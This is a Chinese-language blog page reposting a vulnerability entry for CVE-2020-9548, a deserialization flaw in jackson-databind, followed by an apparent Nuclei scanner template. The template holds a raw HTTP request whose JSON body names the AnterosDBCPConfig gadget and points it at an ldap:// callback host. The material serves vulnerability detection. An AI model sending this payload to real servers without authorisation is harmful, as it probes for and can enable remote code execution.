FasterXML Jackson Databind Remote Code Execution Vulnerability

漏洞信息

漏洞名称: FasterXML Jackson Databind Remote Code Execution Vulnerability

漏洞编号:

  • CVE: CVE-2020-9548

漏洞类型: 反序列化

漏洞等级: 严重

漏洞描述: FasterXML Jackson Databind是一个流行的Java库,用于将Java对象序列化为JSON和反序列化JSON为Java对象。它广泛应用于各种Java应用程序中,特别是在Web服务和微服务架构中,用于处理JSON数据。由于其广泛的使用,该库中的漏洞可能影响到大量的应用程序和服务。该漏洞存在于FasterXML jackson-databind 2.x版本中,具体为2.9.10.4之前的版本。漏洞的根本原因在于库在处理序列化小工具和类型交互时的不当处理,特别是与br.com.anteros.dbcp.AnterosDBCPConfig(也称为anteros-core)相关的部分。这种不当处理可能导致远程代码执行(RCE),攻击者可以通过构造恶意的JSON数据来利用此漏洞,从而在目标系统上执行任意代码。由于此漏洞的利用不需要用户交互,且攻击者可以通过网络远程利用,因此其安全风险极高。成功的利用可能导致完全的系统接管,数据泄露,或服务中断。鉴于该漏洞的严重性和易利用性,强烈建议使用受影响版本的用户立即升级到2.9.10.4或更高版本。

产品厂商: fasterxml

产品名称: jackson-databind

影响版本: 2.x before 2.9.10.4

来源: https://github.com/projectdiscovery/nuclei-templates/blob/9096b630e295048c0402d5291bbebc1f0802e703/http%2Fcves%2F2020%2FCVE-2020-9548.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53

id: CVE-2020-9548

info:
  name: FasterXML Jackson Databind <=2.9.10.4 - Remote Code Execution
  author: tomaquet18
  severity: critical
  description: |
    FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPConfig (aka anteros-core).
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-9548
    - https://github.com/fairyming/CVE-2020-9548
    - https://www.sangfor.com/blog/cybersecurity/fasterxml-jackson-databind-remote-code-execution-vulnerability-cve-2020-9548
    - https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd%40%3Cissues.zookeeper.apache.org%3E
    - https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1%40%3Cdev.zookeeper.apache.org%3E
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-9548
    cwe-id: CWE-502
    epss-score: 0.13945
    epss-percentile: 0.93967
    cpe: cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: fasterxml
    product: jackson-databind
  tags: cve,cve2020,jackson,fasterxml,rce

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        [
          "br.com.anteros.dbcp.AnterosDBCPConfig",
          {
            "healthCheckRegistry": "ldap://{{interactsh-url}}"
          }
        ]

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(body, "Error: Class")'
          - 'contains(content_type, "text/plain")'
        condition: and


Github Poc
#projectdiscovery/nuclei-templates:github issues #反序列化
FasterXML Jackson Databind Remote Code Execution Vulnerability
http://example.com/2025/07/09/github_1058790352/
作者
lianccc
发布于
2025年7月9日
许可协议